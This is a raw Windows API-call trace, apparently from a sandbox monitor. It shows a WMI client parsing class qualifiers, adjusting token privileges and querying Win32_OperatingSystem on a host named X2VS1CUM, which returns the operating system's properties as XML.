	[0111.369] SysStringLen (param_1="The Status property is a string indicating the current status of the object. Various operational and non-operational statuses can be defined. Operational statuses are \"OK\", \"Degraded\" and \"Pred Fail\". \"Pred Fail\" indicates that an element may be functioning properly but predicting a failure in the near future. An example is a SMART-enabled hard drive. Non-operational statuses can also be specified. These are \"Error\", \"Starting\", \"Stopping\" and \"Service\". The latter, \"Service\", could apply during mirror-resilvering of a disk, reload of a user permissions list, or other administrative work. Not all such work is on-line, yet the managed element is neither \"OK\" nor in one of the other states.") returned 0x2b9
	[0111.369] SysStringLen (param_1="") returned 0x0
	[0111.370] ??0CHString@@QEAA@XZ () returned 0xd7edd8f128
	[0111.370] IWbemClassObject:Get (in: This=0x2ad206a6020, wszName="Qualifiers", lFlags=0, pVal=0xd7edd8f1a0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0xd7edd8f1a0*(varType=0x200d, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2ad206b0980*(cDims=0x1, fFeatures=0x240, cbElements=0x8, cLocks=0x0, pvData=0x2ad206338e0, rgsabound=((cElements=0x3, lLbound=0))), varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0
	[0111.370] SafeArrayGetLBound (in: psa=0x2ad206b0980, nDim=0x1, plLbound=0xd7edd8f164 | out: plLbound=0xd7edd8f164) returned 0x0
	[0111.370] SafeArrayGetUBound (in: psa=0x2ad206b0980, nDim=0x1, plUbound=0xd7edd8f168 | out: plUbound=0xd7edd8f168) returned 0x0
	[0111.370] SafeArrayGetElement (in: psa=0x2ad206b0980, rgIndices=0xd7edd8f140, pv=0xd7edd8f138 | out: pv=0xd7edd8f138) returned 0x0
	[0111.371] IWbemClassObject:Get (in: This=0x2ad206a4d50, wszName="Name", lFlags=0, pVal=0xd7edd8f180*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0xd7edd8f180*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="MaxLen", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0
	[0111.371] IWbemClassObject:Get (in: This=0x2ad206a4d50, wszName="QualifierValue", lFlags=0, pVal=0xd7edd8f1b8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0xd7edd8f1b8*(varType=0x2008, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2ad206b0880*(cDims=0x1, fFeatures=0x180, cbElements=0x8, cLocks=0x0, pvData=0x2ad20633180, rgsabound=((cElements=0x1, lLbound=0))), varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0
	[0111.371] SafeArrayGetLBound (in: psa=0x2ad206b0880, nDim=0x1, plLbound=0xd7edd8f15c | out: plLbound=0xd7edd8f15c) returned 0x0
	[0111.371] SafeArrayGetUBound (in: psa=0x2ad206b0880, nDim=0x1, plUbound=0xd7edd8f158 | out: plUbound=0xd7edd8f158) returned 0x0
	[0111.371] lstrlenW (lpString="CIMTYPE") returned 7
	[0111.371] lstrlenW (lpString="MaxLen") returned 6
	[0111.371] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="MaxLen", cchCount1=6, lpString2="CIMTYPE", cchCount2=7) returned 3
	[0111.371] lstrlenW (lpString="read") returned 4
	[0111.371] lstrlenW (lpString="MaxLen") returned 6
	[0111.371] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="MaxLen", cchCount1=6, lpString2="read", cchCount2=4) returned 1
	[0111.371] lstrlenW (lpString="write") returned 5
	[0111.371] lstrlenW (lpString="MaxLen") returned 6
	[0111.371] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="MaxLen", cchCount1=6, lpString2="write", cchCount2=5) returned 1
	[0111.371] lstrlenW (lpString="In") returned 2
	[0111.371] lstrlenW (lpString="MaxLen") returned 6
	[0111.371] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="MaxLen", cchCount1=6, lpString2="In", cchCount2=2) returned 3
	[0111.371] lstrlenW (lpString="Out") returned 3
	[0111.371] lstrlenW (lpString="MaxLen") returned 6
	[0111.371] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="MaxLen", cchCount1=6, lpString2="Out", cchCount2=3) returned 1
	[0111.371] SafeArrayGetElement (in: psa=0x2ad206b0880, rgIndices=0xd7edd8f130, pv=0xd7edd8f150 | out: pv=0xd7edd8f150) returned 0x0
	[0111.372] IUnknown:Release (This=0x2ad206a4d50) returned 0x1
	[0111.372] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="ValueMap", cchCount1=8, lpString2="CIMTYPE", cchCount2=7) returned 3
	[0111.372] lstrlenW (lpString="read") returned 4
	[0111.372] lstrlenW (lpString="ValueMap") returned 8
	[0111.372] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="ValueMap", cchCount1=8, lpString2="read", cchCount2=4) returned 3
	[0111.372] lstrlenW (lpString="write") returned 5
	[0111.372] lstrlenW (lpString="ValueMap") returned 8
	[0111.372] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="ValueMap", cchCount1=8, lpString2="write", cchCount2=5) returned 1
	[0111.372] lstrlenW (lpString="In") returned 2
	[0111.372] lstrlenW (lpString="ValueMap") returned 8
	[0111.372] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="ValueMap", cchCount1=8, lpString2="In", cchCount2=2) returned 3
	[0111.372] lstrlenW (lpString="Out") returned 3
	[0111.372] lstrlenW (lpString="ValueMap") returned 8
	[0111.372] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="ValueMap", cchCount1=8, lpString2="Out", cchCount2=3) returned 3
	[0111.372] SafeArrayGetElement (in: psa=0x2ad206b0880, rgIndices=0xd7edd8f130, pv=0xd7edd8f150 | out: pv=0xd7edd8f150) returned 0x0
	[0111.373] IUnknown:Release (This=0x2ad206a5000) returned 0x1
	[0111.373] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="Values", cchCount1=6, lpString2="CIMTYPE", cchCount2=7) returned 3
	[0111.373] lstrlenW (lpString="read") returned 4
	[0111.373] lstrlenW (lpString="Values") returned 6
	[0111.373] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="Values", cchCount1=6, lpString2="read", cchCount2=4) returned 3
	[0111.373] lstrlenW (lpString="write") returned 5
	[0111.373] lstrlenW (lpString="Values") returned 6
	[0111.373] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="Values", cchCount1=6, lpString2="write", cchCount2=5) returned 1
	[0111.373] lstrlenW (lpString="In") returned 2
	[0111.373] lstrlenW (lpString="Values") returned 6
	[0111.373] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="Values", cchCount1=6, lpString2="In", cchCount2=2) returned 3
	[0111.373] lstrlenW (lpString="Out") returned 3
	[0111.373] lstrlenW (lpString="Values") returned 6
	[0111.373] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="Values", cchCount1=6, lpString2="Out", cchCount2=3) returned 3
	[0111.373] SafeArrayGetElement (in: psa=0x2ad206b1200, rgIndices=0xd7edd8f130, pv=0xd7edd8f150 | out: pv=0xd7edd8f150) returned 0x0
	[0111.373] IUnknown:Release (This=0x2ad206a6ae0) returned 0x1
	[0111.374] ??1CHString@@QEAA@XZ () returned 0x7ffbfe19627c
	[0111.374] ??0CHString@@QEAA@XZ () returned 0xd7edd8f318
	[0111.374] ??1CHString@@QEAA@XZ () returned 0x7ffbfe19627c
	[0111.374] lstrlenA (lpString="") returned 0
	[0111.375] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7ff66e6bf38c, cbMultiByte=-1, lpWideCharStr=0x2ad2087c1b0, cchWideChar=1 | out: lpWideCharStr="") returned 1
	[0111.375] ??0CHString@@QEAA@XZ () returned 0xd7edd8f128
	[0111.375] ??1CHString@@QEAA@XZ () returned 0x7ffbfe19627c
	[0111.375] ??0CHString@@QEAA@XZ () returned 0xd7edd8f318
	[0111.375] ??1CHString@@QEAA@XZ () returned 0x7ffbfe19627c
	[0111.376] lstrlenA (lpString="") returned 0
	[0111.376] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7ff66e6bf38c, cbMultiByte=-1, lpWideCharStr=0x2ad2087c220, cchWideChar=1 | out: lpWideCharStr="") returned 1
	[0111.376] ??0CHString@@QEAA@XZ () returned 0xd7edd8f128
	[0111.376] ??1CHString@@QEAA@XZ () returned 0x7ffbfe19627c
	[0111.376] ??0CHString@@QEAA@XZ () returned 0xd7edd8f318
	[0111.377] ??1CHString@@QEAA@XZ () returned 0x7ffbfe19627c
	[0111.377] lstrlenA (lpString="") returned 0
	[0111.377] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7ff66e6bf38c, cbMultiByte=-1, lpWideCharStr=0x2ad2087c0d0, cchWideChar=1 | out: lpWideCharStr="") returned 1
	[0111.377] ??0CHString@@QEAA@XZ () returned 0xd7edd8f128
	[0111.377] ??1CHString@@QEAA@XZ () returned 0x7ffbfe19627c
	[0111.378] ??0CHString@@QEAA@XZ () returned 0xd7edd8f318
	[0111.378] ??1CHString@@QEAA@XZ () returned 0x7ffbfe19627c
	[0111.378] lstrlenA (lpString="") returned 0
	[0111.378] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7ff66e6bf38c, cbMultiByte=-1, lpWideCharStr=0x2ad2087c170, cchWideChar=1 | out: lpWideCharStr="") returned 1
	[0111.379] ??0CHString@@QEAA@XZ () returned 0xd7edd8f128
	[0111.379] ??1CHString@@QEAA@XZ () returned 0x7ffbfe19627c
	[0111.379] ??0CHString@@QEAA@XZ () returned 0xd7edd8f318
	[0111.379] ??1CHString@@QEAA@XZ () returned 0x7ffbfe19627c
	[0111.379] lstrlenA (lpString="") returned 0
	[0111.380] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7ff66e6bf38c, cbMultiByte=-1, lpWideCharStr=0x2ad2087c100, cchWideChar=1 | out: lpWideCharStr="") returned 1
	[0111.381] ??0CHString@@QEAA@XZ () returned 0xd7edd8f128
	[0111.381] ??1CHString@@QEAA@XZ () returned 0x7ffbfe19627c
	[0111.381] ??0CHString@@QEAA@XZ () returned 0xd7edd8f318
	[0111.382] ??1CHString@@QEAA@XZ () returned 0x7ffbfe19627c
	[0111.382] lstrlenA (lpString="") returned 0
	[0111.382] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7ff66e6bf38c, cbMultiByte=-1, lpWideCharStr=0x2ad2087c140, cchWideChar=1 | out: lpWideCharStr="") returned 1
	[0111.382] ??0CHString@@QEAA@XZ () returned 0xd7edd8f128
	[0111.382] ??1CHString@@QEAA@XZ () returned 0x7ffbfe19627c
	[0111.383] ??0CHString@@QEAA@XZ () returned 0xd7edd8f318
	[0111.383] ??1CHString@@QEAA@XZ () returned 0x7ffbfe19627c
	[0111.383] lstrlenA (lpString="") returned 0
	[0111.383] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7ff66e6bf38c, cbMultiByte=-1, lpWideCharStr=0x2ad2087c1a0, cchWideChar=1 | out: lpWideCharStr="") returned 1
	[0111.383] ??0CHString@@QEAA@XZ () returned 0xd7edd8f128
	[0111.384] ??1CHString@@QEAA@XZ () returned 0x7ffbfe19627c
	[0111.384] ??0CHString@@QEAA@XZ () returned 0xd7edd8f318
	[0111.384] ??1CHString@@QEAA@XZ () returned 0x7ffbfe19627c
	[0111.384] lstrlenA (lpString="") returned 0
	[0111.384] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7ff66e6bf38c, cbMultiByte=-1, lpWideCharStr=0x2ad2087c170, cchWideChar=1 | out: lpWideCharStr="") returned 1
	[0111.385] ??0CHString@@QEAA@XZ () returned 0xd7edd8f128
	[0111.385] ??1CHString@@QEAA@XZ () returned 0x7ffbfe19627c
	[0111.386] ??1CHString@@QEAA@XZ () returned 0x7ffbfe19627c
	[0111.387] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="*", cchCount1=1, lpString2="FROM", cchCount2=4) returned 1
	[0111.387] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="from", cchCount1=4, lpString2="FROM", cchCount2=4) returned 2
	[0111.387] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="get", cchCount1=3, lpString2="SET", cchCount2=3) returned 1
	[0111.387] lstrlenW (lpString="CREATE") returned 6
	[0111.387] lstrlenW (lpString="get") returned 3
	[0111.387] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="get", cchCount1=3, lpString2="CREATE", cchCount2=6) returned 3
	[0111.387] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="get", cchCount1=3, lpString2="GET", cchCount2=3) returned 2
	[0111.388] ??0CHString@@QEAA@XZ () returned 0xd7edd8fa10
	[0111.388] memcpy_s (in: _Destination=0x2ad2087c2e0, _DestinationSize=0x1e, _Source=0x2ad206504b8, _SourceSize=0x10 | out: _Destination=0x2ad2087c2e0) returned 0x0
	[0111.388] lstrlenW (lpString="&") returned 1
	[0111.388] lstrlenW (lpString="&amp;") returned 5
	[0111.388] lstrlenW (lpString="<") returned 1
	[0111.388] lstrlenW (lpString="&lt;") returned 4
	[0111.388] lstrlenW (lpString=">") returned 1
	[0111.389] lstrlenW (lpString="&gt;") returned 4
	[0111.389] lstrlenW (lpString="'") returned 1
	[0111.389] lstrlenW (lpString="&apos;") returned 6
	[0111.389] lstrlenW (lpString="\"") returned 1
	[0111.389] lstrlenW (lpString="&quot;") returned 6
	[0111.389] ?Format@CHString@@QEAAXPEBGZZ () returned 0x2ad22a620bc
	[0111.389] ??1CHString@@QEAA@XZ () returned 0x1
	[0111.389] WbemLocator:IUnknown:AddRef (This=0x2ad205e42f0) returned 0x3
	[0111.390] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="X2VS1CUM", cchCount1=8, lpString2="", cchCount2=0) returned 3
	[0111.390] lstrlenW (lpString="X2VS1CUM") returned 8
	[0111.390] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x28, TokenHandle=0xd7edd8f8a0 | out: TokenHandle=0xd7edd8f8a0*=0x2a0) returned 1
	[0111.390] GetTokenInformation (in: TokenHandle=0x2a0, TokenInformationClass=0x3, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xd7edd8f898 | out: TokenInformation=0x0, ReturnLength=0xd7edd8f898) returned 0
	[0111.390] GetTokenInformation (in: TokenHandle=0x2a0, TokenInformationClass=0x3, TokenInformation=0x2ad22a61380, TokenInformationLength=0x40, ReturnLength=0xd7edd8f898 | out: TokenInformation=0x2ad22a61380, ReturnLength=0xd7edd8f898) returned 1
	[0111.390] AdjustTokenPrivileges (in: TokenHandle=0x2a0, DisableAllPrivileges=0, NewState=0x2ad22a61380*(PrivilegesCount=0x5, Privileges=((Luid.LowPart=0x13, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=3, Attributes=0x19), (Luid.LowPart=0x2, Luid.HighPart=33, Attributes=0x0), (Luid.LowPart=0x22, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=-733280482, Attributes=0x80002300))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1
	[0111.390] CloseHandle (hObject=0x2a0) returned 1
	[0111.390] lstrlenW (lpString="GET") returned 3
	[0111.390] lstrlenW (lpString="get") returned 3
	[0111.390] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="get", cchCount1=3, lpString2="GET", cchCount2=3) returned 2
	[0111.391] lstrlenA (lpString="") returned 0
	[0111.391] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7ff66e6bf38c, cbMultiByte=-1, lpWideCharStr=0x2ad2087c200, cchWideChar=1 | out: lpWideCharStr="") returned 1
	[0111.391] lstrlenA (lpString="") returned 0
	[0111.392] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7ff66e6bf38c, cbMultiByte=-1, lpWideCharStr=0x2ad2087c200, cchWideChar=1 | out: lpWideCharStr="") returned 1
	[0111.392] lstrlenA (lpString="") returned 0
	[0111.400] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7ff66e6bf38c, cbMultiByte=-1, lpWideCharStr=0x2ad2087c0e0, cchWideChar=1 | out: lpWideCharStr="") returned 1
	[0111.400] lstrlenA (lpString="") returned 0
	[0111.401] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7ff66e6bf38c, cbMultiByte=-1, lpWideCharStr=0x2ad2087c140, cchWideChar=1 | out: lpWideCharStr="") returned 1
	[0111.401] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="*", cchCount1=1, lpString2="FROM", cchCount2=4) returned 1
	[0111.401] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="from", cchCount1=4, lpString2="FROM", cchCount2=4) returned 2
	[0111.402] lstrlenA (lpString=" FROM ") returned 6
	[0111.402] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7ff66e6c0020, cbMultiByte=-1, lpWideCharStr=0x2ad22a65630, cchWideChar=7 | out: lpWideCharStr=" FROM ") returned 7
	[0111.402] lstrlenA (lpString="SELECT ") returned 7
	[0111.402] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7ff66e6c0028, cbMultiByte=-1, lpWideCharStr=0x2ad22a65950, cchWideChar=8 | out: lpWideCharStr="SELECT ") returned 8
	[0111.402] ??0CHString@@QEAA@XZ () returned 0xd7edd8b770
	[0111.402] GetCurrentThreadId () returned 0x6bc
	[0111.402] CoCreateInstance (in: rclsid=0x7ff66e6c3548*(Data1=0x8d1c559d, Data2=0x84f0, Data3=0x4bb3, Data4=([0]=0xa7, [1]=0xd5, [2]=0x56, [3]=0xa7, [4]=0x43, [5]=0x5a, [6]=0x9b, [7]=0xa6)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x7ff66e6c3558*(Data1=0xbfbf883a, Data2=0xcad7, Data3=0x11d3, Data4=([0]=0xa1, [1]=0x1b, [2]=0x0, [3]=0x10, [4]=0x5a, [5]=0x1f, [6]=0x51, [7]=0x5a)), ppv=0x7ff66e6da8c0 | out: ppv=0x7ff66e6da8c0*=0x2ad206b0fd0) returned 0x0
	[0111.404] ??1CHString@@QEAA@XZ () returned 0x7ffbfe19627c
	[0111.404] ??0CHString@@QEAA@XZ () returned 0xd7edd8b770
	[0111.404] GetCurrentThreadId () returned 0x6bc
	[0111.404] WbemLocator:IWbemLocator:ConnectServer (in: This=0x2ad205e42f0, strNetworkResource="\\\\X2VS1CUM\\ROOT\\CIMV2", strUser=0x0, strPassword=0x0, strLocale="ms_409", lSecurityFlags=0, strAuthority=0x0, pCtx=0x0, ppNamespace=0x7ff66e6da8d0 | out: ppNamespace=0x7ff66e6da8d0*=0x2ad20653f60) returned 0x0
	[0111.415] CoSetProxyBlanket (pProxy=0x2ad20653f60, dwAuthnSvc=0xffffffff, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x0) returned 0x0
	[0111.415] ??1CHString@@QEAA@XZ () returned 0x7ffbfe19627c
	[0111.415] ??0CHString@@QEAA@XZ () returned 0xd7edd8b668
	[0111.415] GetCurrentThreadId () returned 0x6bc
	[0111.415] ??0CHString@@QEAA@XZ () returned 0xd7edd8b610
	[0111.415] GetCurrentThreadId () returned 0x6bc
	[0111.415] CoCreateInstanceEx (in: Clsid=0x7ff66e6c3528*(Data1=0x674b6698, Data2=0xee92, Data3=0x11d0, Data4=([0]=0xad, [1]=0x71, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xd8, [6]=0xfd, [7]=0xff)), punkOuter=0x0, dwClsCtx=0x1, pServerInfo=0x0, dwCount=0x1, pResults=0xd7edd8b5c0 | out: pResults=((pIID=0x7ff66e6c3538*(Data1=0x44aca674, Data2=0xe8fc, Data3=0x11d0, Data4=([0]=0xa0, [1]=0x7c, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xb6, [6]=0x88, [7]=0x20)), pItf=0x2ad20653a20, hr=0x0))) returned 0x0
	[0111.416] ??1CHString@@QEAA@XZ () returned 0x7ffbfe19627c
	[0111.501] WbemObjectTextSrc:IWbemObjectTextSrc:GetText (in: This=0x2ad206b0fd0, lFlags=0, pObj=0x2ad206a8310, uObjTextFormat=0x1, pCtx=0x2ad20653a20, strText=0xd7edd8b670 | out: strText=0xd7edd8b670*="<INSTANCE CLASSNAME=\"Win32_OperatingSystem\"><PROPERTY NAME=\"BootDevice\" CLASSORIGIN=\"Win32_OperatingSystem\" TYPE=\"string\"><VALUE>\\Device\\HarddiskVolume1</VALUE></PROPERTY><PROPERTY NAME=\"BuildNumber\" CLASSORIGIN=\"Win32_OperatingSystem\" TYPE=\"string\"><VALUE>10586</VALUE></PROPERTY><PROPERTY NAME=\"BuildType\" CLASSORIGIN=\"Win32_OperatingSystem\" TYPE=\"string\"><VALUE>Multiprocessor Free</VALUE></PROPERTY><PROPERTY NAME=\"Caption\" CLASSORIGIN=\"CIM_ManagedSystemElement\" TYPE=\"string\"><VALUE>Microsoft Windows 10 Pro</VALUE></PROPERTY><PROPERTY NAME=\"CodeSet\" CLASSORIGIN=\"Win32_OperatingSystem\" TYPE=\"string\"><VALUE>1252</VALUE></PROPERTY><PROPERTY NAME=\"CountryCode\" CLASSORIGIN=\"Win32_OperatingSystem\" TYPE=\"string\"><VALUE>1</VALUE></PROPERTY><PROPERTY NAME=\"CreationClassName\" CLASSORIGIN=\"CIM_OperatingSystem\" TYPE=\"string\"><VALUE>Win32_OperatingSystem</VALUE></PROPERTY><PROPERTY NAME=\"CSCreationClassName\" CLASSORIGIN=\"CIM_OperatingSystem\" TYPE=\"string\"><VALUE>Win32_ComputerSystem</VALUE></PROPERTY><PROPERTY NAME=\"CSDVersion\" CLASSORIGIN=\"Win32_OperatingSystem\" PROPAGATED=\"true\" TYPE=\"string\"></PROPERTY><PROPERTY NAME=\"CSName\" CLASSORIGIN=\"CIM_OperatingSystem\" TYPE=\"string\"><VALUE>X2VS1CUM</VALUE></PROPERTY><PROPERTY NAME=\"CurrentTimeZone\" CLASSORIGIN=\"CIM_OperatingSystem\" TYPE=\"sint16\"><VALUE>120</VALUE></PROPERTY><PROPERTY NAME=\"DataExecutionPrevention_32BitApplications\" CLASSORIGIN=\"Win32_OperatingSystem\" TYPE=\"boolean\"><VALUE>TRUE</VALUE></PROPERTY><PROPERTY NAME=\"DataExecutionPrevention_Available\" CLASSORIGIN=\"Win32_OperatingSystem\" TYPE=\"boolean\"><VALUE>TRUE</VALUE></PROPERTY><PROPERTY NAME=\"DataExecutionPrevention_Drivers\" CLASSORIGIN=\"Win32_OperatingSystem\" TYPE=\"boolean\"><VALUE>TRUE</VALUE></PROPERTY><PROPERTY NAME=\"DataExecutionPrevention_SupportPolicy\" CLASSORIGIN=\"Win32_OperatingSystem\" TYPE=\"uint8\"><VALUE>2</VALUE></PROPERTY><PROPERTY NAME=\"Debug\" CLASSORIGIN=\"Win32_OperatingSystem\" TYPE=\"boolean\"><VALUE>FALSE</VALUE></PROPERTY><PROPERTY NAME=\"Description\" CLASSORIGIN=\"CIM_ManagedSystemElement\" TYPE=\"string\"><VALUE></VALUE></PROPERTY><PROPERTY NAME=\"Distributed\" CLASSORIGIN=\"CIM_OperatingSystem\" TYPE=\"boolean\"><VALUE>FALSE</VALUE></PROPERTY><PROPERTY NAME=\"EncryptionLevel\" CLASSORIGIN=\"Win32_OperatingSystem\" TYPE=\"uint32\"><VALUE>256</VALUE></PROPERTY><PROPERTY NAME=\"ForegroundApplicationBoost\" CLASSORIGIN=\"Win32_OperatingSystem\" TYPE=\"uint8\"><VALUE>2</VALUE></PROPERTY><PROPERTY NAME=\"FreePhysicalMemory\" CLASSORIGIN=\"CIM_OperatingSystem\" TYPE=\"uint64\"><VALUE>385684</VALUE></PROPERTY><PROPERTY NAME=\"FreeSpaceInPagingFiles\" CLASSORIGIN=\"CIM_OperatingSystem\" TYPE=\"uint64\"><VALUE>3593388</VALUE></PROPERTY><PROPERTY NAME=\"FreeVirtualMemory\" CLASSORIGIN=\"CIM_OperatingSystem\" TYPE=\"uint64\"><VALUE>968780</VALUE></PROPERTY><PROPERTY NAME=\"InstallDate\" CLASSORIGIN=\"CIM_ManagedSystemElement\" TYPE=\"datetime\"><VALUE>20170802150607.000000+120</VALUE></PROPERTY><PROPERTY NAME=\"LargeSystemCache\" CLASSORIGIN=\"Win32_OperatingSystem\" PROPAGATED=\"true\" TYPE=\"uint32\"></PROPERTY><PROPERTY NAME=\"LastBootUpTime\" CLASSORIGIN=\"CIM_OperatingSystem\" TYPE=\"datetime\"><VALUE>20180626225658.765149+120</VALUE></PROPERTY><PROPERTY NAME=\"LocalDateTime\" CLASSORIGIN=\"CIM_OperatingSystem\" TYPE=\"datetime\"><VALUE>20180626230007.241000+120</VALUE></PROPERTY><PROPERTY NAME=\"Locale\" CLASSORIGIN=\"Win32_OperatingSystem\" TYPE=\"string\"><VALUE>0409</VALUE></PROPERTY><PROPERTY NAME=\"Manufacturer\" CLASSORIGIN=\"Win32_OperatingSystem\" TYPE=\"string\"><VALUE>Microsoft Corporation</VALUE></PROPERTY><PROPERTY NAME=\"MaxNumberOfProcesses\" CLASSORIGIN=\"CIM_OperatingSystem\" TYPE=\"uint32\"><VALUE>4294967295</VALUE></PROPERTY><PROPERTY NAME=\"MaxProcessMemorySize\" CLASSORIGIN=\"CIM_OperatingSystem\" TYPE=\"uint64\"><VALUE>137438953344</VALUE></PROPERTY><PROPERTY.ARRAY NAME=\"MUILanguages\" CLASSORIGIN=\"Win32_OperatingSystem\" TYPE=\"string\"><VALUE.ARRAY><VALUE>en-US</VALUE></VALUE.ARRAY></PROPERTY.ARRAY><PROPERTY NAME=\"Name\" CLASSORIGIN=\"CIM_ManagedSystemElement\" TYPE=\"string\"><VALUE>Microsoft Windows 10 Pro|C:\\Windows|\\Device\\Harddisk0\\Partition1</VALUE></PROPERTY><PROPERTY NAME=\"NumberOfLicensedUsers\" CLASSORIGIN=\"CIM_OperatingSystem\" PROPAGATED=\"true\" TYPE=\"uint32\"></PROPERTY><PROPERTY NAME=\"NumberOfProcesses\" CLASSORIGIN=\"CIM_OperatingSystem\" TYPE=\"uint32\"><VALUE>61</VALUE></PROPERTY><PROPERTY NAME=\"NumberOfUsers\" CLASSORIGIN=\"CIM_OperatingSystem\" TYPE=\"uint32\"><VALUE>2</VALUE></PROPERTY><PROPERTY NAME=\"OperatingSystemSKU\" CLASSORIGIN=\"Win32_OperatingSystem\" TYPE=\"uint32\"><VALUE>48</VALUE></PROPERTY><PROPERTY NAME=\"Organization\" CLASSORIGIN=\"Win32_OperatingSystem\" TYPE=\"string\"><VALUE>NHaYZ2</VALUE></PROPERTY><PROPERTY NAME=\"OSArchitecture\" CLASSORIGIN=\"Win32_OperatingSystem\" TYPE=\"string\"><VALUE>64-bit</VALUE></PROPERTY><PROPERTY NAME=\"OSLanguage\" CLASSORIGIN=\"Win32_OperatingSystem\" TYPE=\"uint32\"><VALUE>1033</VALUE></PROPERTY><PROPERTY NAME=\"OSProductSuite\" CLASSORIGIN=\"Win32_OperatingSystem\" TYPE=\"uint32\"><VALUE>256</VALUE></PROPERTY><PROPERTY NAME=\"OSType\" CLASSORIGIN=\"CIM_OperatingSystem\" TYPE=\"uint16\"><VALUE>18</VALUE></PROPERTY><PROPERTY NAME=\"OtherTypeDescription\" CLASSORIGIN=\"CIM_Op") returned 0x0
	[0111.507] ??1CHString@@QEAA@XZ () returned 0x7ffbfe19627c
	[0111.507] ??0CHString@@QEAA@XZ () returned 0xd7edd8f948
	[0111.507] ?Format@CHString@@QEAAXPEBGZZ () returned 0x2ad22a66aec
	[0111.507] ??1CHString@@QEAA@XZ () returned 0x1
	[0111.507] ??0CHString@@QEAA@XZ () returned 0xd7edd8f900
	[0111.508] ?Format@CHString@@QEAAXPEBGZZ () returned 0x2ad22a66aec
	[0111.508] ??0CHString@@QEAA@XZ () returned 0xd7edd8f8f0
	[0111.508] ??0CHString@@QEAA@XZ () returned 0xd7edd8f880
	[0111.508] ?Format@CHString@@QEAAXPEBGZZ () returned 0x2ad22a620bc
	[0111.508] ??1CHString@@QEAA@XZ () returned 0x1
	[0111.509] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="get", cchCount1=3, lpString2="LIST", cchCount2=4) returned 1
	[0111.510] ??1CHString@@QEAA@XZ () returned 0x7ffbfe19627c
	[0111.510] ??0CHString@@QEAA@XZ () returned 0xd7edd8f870
	[0111.510] ?Format@CHString@@QEAAXPEBGZZ () returned 0x2ad22a66ebc
	[0111.511] ??1CHString@@QEAA@XZ () returned 0x1
	[0111.511] ??1CHString@@QEAA@XZ () returned 0x1
	[0111.512] ?Empty@CHString@@QEAAXXZ () returned 0x7ffbfe19627c
	[0111.512] _kbhit () returned 0x0
